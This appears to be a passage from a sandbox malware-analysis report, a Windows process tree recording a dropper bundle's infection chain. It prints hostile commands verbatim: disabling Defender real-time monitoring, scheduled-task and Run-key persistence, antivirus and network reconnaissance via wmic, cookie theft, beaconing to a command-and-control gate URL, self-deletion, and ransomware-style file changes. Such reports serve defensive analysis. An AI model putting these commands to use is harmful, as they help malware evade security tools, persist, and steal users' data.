                                                                        PID:4708
                                                                • C:\Users\Admin\Documents\EkMocBt6Vvcatw5Fzey0rKRM.exe
                                                                  "C:\Users\Admin\Documents\EkMocBt6Vvcatw5Fzey0rKRM.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:5676
                                                                  • C:\Users\Admin\Documents\EkMocBt6Vvcatw5Fzey0rKRM.exe
                                                                    "{path}"
                                                                    7⤵
                                                                      PID:352
                                                                  • C:\Users\Admin\Documents\UU9RRO8MKDB7sE50xs5Vfrhf.exe
                                                                    "C:\Users\Admin\Documents\UU9RRO8MKDB7sE50xs5Vfrhf.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    PID:5724
                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      • Modifies registry class
                                                                      PID:5336
                                                                  • C:\Users\Admin\Documents\C1o0v6ozOio3edzyRn9RipVM.exe
                                                                    "C:\Users\Admin\Documents\C1o0v6ozOio3edzyRn9RipVM.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5844
                                                                  • C:\Users\Admin\Documents\bxrrRJ2q52KQiRMTsEQMxeg0.exe
                                                                    "C:\Users\Admin\Documents\bxrrRJ2q52KQiRMTsEQMxeg0.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5808
                                                                    • C:\Users\Admin\Documents\bxrrRJ2q52KQiRMTsEQMxeg0.exe
                                                                      C:\Users\Admin\Documents\bxrrRJ2q52KQiRMTsEQMxeg0.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:6104
                                                                  • C:\Users\Admin\Documents\b2MSKI9jTJKWIZXb_eswV3n4.exe
                                                                    "C:\Users\Admin\Documents\b2MSKI9jTJKWIZXb_eswV3n4.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:5780
                                                                  • C:\Users\Admin\Documents\AzM5wWF51FXq9GHb_d6j0PWL.exe
                                                                    "C:\Users\Admin\Documents\AzM5wWF51FXq9GHb_d6j0PWL.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6072
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sotema_8.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3240
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_8.exe
                                                                  sotema_8.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:376
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sotema_10.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1000
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_10.exe
                                                                  sotema_10.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:1448
                                                                  • C:\Users\Admin\AppData\Roaming\gS9ToM3m4fp6Md4HBF5Z4aYM.exe
                                                                    "C:\Users\Admin\AppData\Roaming\gS9ToM3m4fp6Md4HBF5Z4aYM.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:4532
                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4052
                                                                  • C:\Users\Admin\AppData\Roaming\X3EcY90ylnnvDnOUzcYjeMzN.exe
                                                                    "C:\Users\Admin\AppData\Roaming\X3EcY90ylnnvDnOUzcYjeMzN.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4776
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "owegj" /tr '"C:\Users\Admin\AppData\Roaming\owegj.exe"' & exit
                                                                      7⤵
                                                                        PID:7144
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /create /f /sc onlogon /rl highest /tn "owegj" /tr '"C:\Users\Admin\AppData\Roaming\owegj.exe"'
                                                                          8⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:2852
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD528.tmp.bat""
                                                                        7⤵
                                                                          PID:3432
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 3
                                                                            8⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:5348
                                                                          • C:\Users\Admin\AppData\Roaming\owegj.exe
                                                                            "C:\Users\Admin\AppData\Roaming\owegj.exe"
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:7024
                                                                      • C:\Users\Admin\AppData\Roaming\AUJKDC73gtETEKIBq2AfPLsg.exe
                                                                        "C:\Users\Admin\AppData\Roaming\AUJKDC73gtETEKIBq2AfPLsg.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks processor information in registry
                                                                        PID:5088
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im AUJKDC73gtETEKIBq2AfPLsg.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\AUJKDC73gtETEKIBq2AfPLsg.exe" & del C:\ProgramData\*.dll & exit
                                                                          7⤵
                                                                            PID:3964
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im AUJKDC73gtETEKIBq2AfPLsg.exe /f
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:5184
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              8⤵
                                                                              • Loads dropped DLL
                                                                              • Delays execution with timeout.exe
                                                                              • Modifies registry class
                                                                              PID:4692
                                                                        • C:\Users\Admin\AppData\Roaming\73eKPTlG3x6uHaN4o0UjzJEX.exe
                                                                          "C:\Users\Admin\AppData\Roaming\73eKPTlG3x6uHaN4o0UjzJEX.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          PID:4696
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:2060
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:6132
                                                                        • C:\Users\Admin\AppData\Roaming\0ljcBzrLE1effqjSBh1PreMY.exe
                                                                          "C:\Users\Admin\AppData\Roaming\0ljcBzrLE1effqjSBh1PreMY.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          PID:1572
                                                                          • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                                            7⤵
                                                                            • Loads dropped DLL
                                                                            PID:6540
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sotema_9.exe
                                                                      4⤵
                                                                        PID:3560
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_9.exe
                                                                    sotema_9.exe
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4112
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_9.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\7zS08303804\sotema_9.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      PID:5836
                                                                • \??\c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                  1⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:404
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                    2⤵
                                                                    • Drops file in System32 directory
                                                                    • Checks processor information in registry
                                                                    • Modifies registry class
                                                                    PID:4616
                                                                • C:\Windows\system32\taskmgr.exe
                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                  1⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Checks processor information in registry
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:4408
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies Internet Explorer settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:7116
                                                                • C:\Windows\system32\browser_broker.exe
                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                  1⤵
                                                                  • Modifies Internet Explorer settings
                                                                  PID:4716
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6136
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                    PID:896
                                                                  • C:\Users\Admin\AppData\Local\Temp\FEE7.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\FEE7.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5240
                                                                  • C:\Users\Admin\AppData\Local\Temp\BD.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\BD.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6488
                                                                  • C:\Users\Admin\AppData\Local\Temp\32F.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\32F.exe
                                                                    1⤵
                                                                      PID:6720
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:4176
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                        PID:4496
                                                                      • C:\Users\Admin\AppData\Local\Temp\5BA1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\5BA1.exe
                                                                        1⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5044
                                                                        • C:\Users\Admin\AppData\Local\Temp\5BA1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\5BA1.exe
                                                                          2⤵
                                                                            PID:4172
                                                                        • C:\Users\Admin\AppData\Local\Temp\6007.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\6007.exe
                                                                          1⤵
                                                                          • Loads dropped DLL
                                                                          PID:4976
                                                                        • C:\Users\Admin\AppData\Local\Temp\64DA.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\64DA.exe
                                                                          1⤵
                                                                            PID:6656
                                                                          • C:\Users\Admin\AppData\Local\Temp\672D.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\672D.exe
                                                                            1⤵
                                                                              PID:5656
                                                                            • C:\Users\Admin\AppData\Local\Temp\69ED.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\69ED.exe
                                                                              1⤵
                                                                                PID:6032
                                                                              • C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                1⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5516
                                                                                • C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                  2⤵
                                                                                    PID:5668
                                                                                  • C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\6D98.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5676
                                                                                • C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                  1⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3832
                                                                                  • C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                    2⤵
                                                                                    • Adds Run key to start application
                                                                                    PID:2268
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Users\Admin\AppData\Local\5e2c3a09-3e31-41e1-b563-39d0633120b8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                      3⤵
                                                                                      • Modifies file permissions
                                                                                      PID:6496
                                                                                    • C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\71A0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                      3⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5092
                                                                                      • C:\Users\Admin\AppData\Local\Temp\71A0.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\71A0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                        4⤵
                                                                                        • Modifies extensions of user files
                                                                                        PID:6856
                                                                                        • C:\Users\Admin\AppData\Local\60319dd9-ade1-4190-88b7-0d56edbfe806\build2.exe
                                                                                          "C:\Users\Admin\AppData\Local\60319dd9-ade1-4190-88b7-0d56edbfe806\build2.exe"
                                                                                          5⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5424
                                                                                          • C:\Users\Admin\AppData\Local\60319dd9-ade1-4190-88b7-0d56edbfe806\build2.exe
                                                                                            "C:\Users\Admin\AppData\Local\60319dd9-ade1-4190-88b7-0d56edbfe806\build2.exe"
                                                                                            6⤵
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:5840
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\60319dd9-ade1-4190-88b7-0d56edbfe806\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                              7⤵
                                                                                                PID:1584
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im build2.exe /f
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:6468
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 6
                                                                                                  8⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:6300
                                                                                  • C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                    1⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4672
                                                                                    • C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                      2⤵
                                                                                        PID:5592
                                                                                      • C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\722D.exe
                                                                                        2⤵
                                                                                          PID:5672
                                                                                      • C:\Users\Admin\AppData\Local\Temp\729C.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\729C.exe
                                                                                        1⤵
                                                                                          PID:6936
                                                                                        • C:\Users\Admin\AppData\Local\Temp\77BD.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\77BD.exe
                                                                                          1⤵
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:6168
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7B97.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7B97.exe
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4500
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7B97.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\7B97.exe
                                                                                            2⤵
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6576
                                                                                            • C:\Users\Admin\AppData\Local\Temp\gmaq1ZYofwENj9tB.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\gmaq1ZYofwENj9tB.exe"
                                                                                              3⤵
                                                                                                PID:4924
                                                                                                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
                                                                                                  4⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4680
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
                                                                                                    5⤵
                                                                                                      PID:1148
                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                      "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
                                                                                                      5⤵
                                                                                                        PID:6780
                                                                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                        "wmic" os get caption /FORMAT:List
                                                                                                        5⤵
                                                                                                          PID:1468
                                                                                                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                          "wmic" path win32_VideoController get caption /FORMAT:List
                                                                                                          5⤵
                                                                                                            PID:4336
                                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                            "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
                                                                                                            5⤵
                                                                                                              PID:6224
                                                                                                            • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                              "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
                                                                                                              5⤵
                                                                                                                PID:6308
                                                                                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                                                                                                                5⤵
                                                                                                                  PID:5196
                                                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                  "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                                                                                                                  5⤵
                                                                                                                    PID:4752
                                                                                                                  • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                    /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
                                                                                                                    5⤵
                                                                                                                      PID:5760
                                                                                                                    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                      /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
                                                                                                                      5⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:6656
                                                                                                                    • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                      /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
                                                                                                                      5⤵
                                                                                                                        PID:6236
                                                                                                                      • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                        /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
                                                                                                                        5⤵
                                                                                                                          PID:6284
                                                                                                                        • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                          X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                                                                                                                          5⤵
                                                                                                                            PID:4440
                                                                                                                            • C:\Windows\write.exe
                                                                                                                              X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                              6⤵
                                                                                                                                PID:7108
                                                                                                                              • C:\Windows\notepad.exe
                                                                                                                                X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                                6⤵
                                                                                                                                • Opens file in notepad (likely ransom note)
                                                                                                                                PID:2208
                                                                                                                            • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                              X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                                                                                                                              5⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:6104
                                                                                                                            • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                              X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                                                                                                                              5⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3956
                                                                                                                            • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                              X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
                                                                                                                              5⤵
                                                                                                                                PID:4732
                                                                                                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                                                                                                                                5⤵
                                                                                                                                  PID:4996
                                                                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                  "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                                                                                                                                  5⤵
                                                                                                                                    PID:6624
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    "taskkill" /PID 4440 /F
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:6200
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    "taskkill" /PID 4680 /F
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:4056
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell" Start-Sleep -s 15;Start-Process 'C:\Users\Admin\AppData\Roaming\EdgeCP\2513A437C8CB.exe'
                                                                                                                                    5⤵
                                                                                                                                      PID:392
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\EdgeCP\2513A437C8CB.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\EdgeCP\2513A437C8CB.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:4772
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2513A437C8CB.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2513A437C8CB.exe
                                                                                                                                          7⤵
                                                                                                                                            PID:6584
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2513A437C8CB.exe' -Force -Recurse
                                                                                                                                              8⤵
                                                                                                                                                PID:5336
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:5896
                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                    "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
                                                                                                                                                    9⤵
                                                                                                                                                      PID:6308
                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                      "wmic" os get caption /FORMAT:List
                                                                                                                                                      9⤵
                                                                                                                                                        PID:4640
                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                        "wmic" path win32_VideoController get caption /FORMAT:List
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5876
                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                          "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6888
                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                            "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
                                                                                                                                                            9⤵
                                                                                                                                                              PID:4568
                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                              "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
                                                                                                                                                              9⤵
                                                                                                                                                                PID:4132
                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:5680
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
                                                                                                                                                                  /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:3952
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "taskkill" /PID 4732 /F
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5216
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "taskkill" /PID 3956 /F
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5908
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "taskkill" /PID 6104 /F
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:6920
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\gmaq1ZYofwENj9tB.exe' -Force -Recurse
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5056
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\WWDZuXppnKPjP1R7.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\WWDZuXppnKPjP1R7.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:7128
